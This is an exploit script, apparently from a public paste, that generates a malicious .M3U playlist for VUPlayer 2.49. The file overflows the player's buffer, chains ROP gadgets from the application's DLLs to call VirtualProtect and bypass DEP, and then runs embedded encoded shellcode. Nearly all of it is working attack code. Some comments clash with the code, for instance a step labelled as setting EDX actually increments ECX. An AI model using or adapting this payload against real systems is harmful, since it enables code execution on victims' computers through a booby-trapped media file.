
VUPlayer 2.49 - (.M3U) Universal Buffer Overflow DEP Bypass

Dec 16th, 2013
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  1. # VUPlayer 2.49 (.M3U) Exploit(Universal buffer overflow/DEP bypass)
  2. # Download:
  3. # Tested on Wind0ws XP SP3 DEP:OptOut
  4. # Author: Lu_c_fer ------>>> , (feel free to tell me your ideas!! :))
  6. # All the Gadgets are from APP's DLLs(I could only use the addresses that doesnt start with null)
  10. import struct
  12. p = open("Exploit_VirtualProtect.m3u", "w")
  14. crash = "\x41" * 1012
  16. sc = ("\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
  17. "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
  18. "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
  19. "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
  20. "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
  21. "\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
  22. "\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
  23. "\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
  24. "\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
  25. "\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
  26. "\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
  27. "\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
  28. "\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
  29. "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
  30. "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
  31. "\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
  32. "\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
  33. "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
  34. "\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
  35. "\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
  36. "\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
  37. "\x51\x42\x4c\x42\x43\x43\x30\x41\x41")
  39. #---------------------------Setting 0x00000201 into EBX----------------------------
  40. rop = struct.pack('<L',0x10015f77) # POP EAX # RETN
  41. rop += struct.pack('<L',0x5f5f01ff)
  42. rop += struct.pack('<L',0x1001e453) # SUB EAX,5F5EFFFE # RETN 0x04
  43. rop += struct.pack('<L',0x1003a084)
  44. rop += struct.pack('<L',0x42424242)
  45. rop += struct.pack('<L',0x1001033f) # INC EAX # RETN
  46. rop += struct.pack('<L',0x100110ff) # POP EBX # RETN [BASS.dll]
  47. rop += struct.pack('<L',0xffffffff) #
  48. rop += struct.pack('<L',0x10015ef2) # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
  50. #---------------------------Setting the pinter to the VirtualProtect into ESI----------------------------
  52. rop += struct.pack('<L',0x10015f77) # POP EAX # RETN
  53. rop += struct.pack('<L',0x10109270) # ptr to &VirtualProtect() [IAT BASSWMA.dll]
  54. rop += struct.pack('<L',0x1001eaf1) # MOV EAX,DWORD PTR DS:[EAX] # RETN [BASS.dll]
  55. rop += struct.pack('<L',0x10030950) # XCHG EAX,ESI # RETN [BASS.dll]
  57. #---------------------------Setting 0x00000040 into EDX(*******TRUST ME IT WAS THE ONLY WAY!!! :)******)----------------------------
  58. rop += struct.pack('<L',0x1004041c) # POP EDX # RETN [BASS.dll]
  59. rop += struct.pack('<L',0xffffffff)
  60. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  61. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  62. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  63. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  64. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  65. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  66. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  67. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  68. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  69. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  70. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  71. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  72. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  73. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  74. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  75. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  76. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  77. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  78. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  79. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  80. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  81. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  82. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  83. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  84. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  85. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  86. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  87. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  88. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  89. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  90. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  91. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  92. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  93. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  94. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  95. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  96. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  97. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  98. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  99. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  100. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  101. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  102. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  103. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  104. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  105. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  106. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  107. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  108. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  109. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  110. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  111. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  112. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  113. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  114. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  115. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  116. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  117. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  118. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  119. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  120. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  121. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  122. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  123. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  124. rop += struct.pack('<L',0x100332eb) # INC ECX # RETN
  125. # ECX is now 0x00000040
  128. rop += struct.pack('<L',0x10010157) # POP EBP # RETN [BASS.dll]
  129. rop += struct.pack('<L',0x1010539f) # & jmp esp [BASSWMA.dll]
  131. rop += struct.pack('<L',0x10601007) # POP ECX # RETN [BASSMIDI.dll]
  132. rop += struct.pack('<L',0x101087c3) # &Writable location [BASSWMA.dll]
  134. rop += struct.pack('<L',0x100190b0) # POP EDI # RETN [BASS.dll]
  135. rop += struct.pack('<L',0x1003a084) # RETN (ROP NOP) [BASS.dll]
  137. rop += struct.pack('<L',0x10015fe7) # POP EAX # RETN [BASS.dll]
  138. rop += struct.pack('<L',0x90909090) # &Writable location
  140. rop += struct.pack('<L',0x1001d7a5) # PUSHAD # RETN [BASS.dll]
  142. nop = "\x90"*40
  144. payload = crash + rop + nop + sc
  147. p.write(payload)
  148. p.close()
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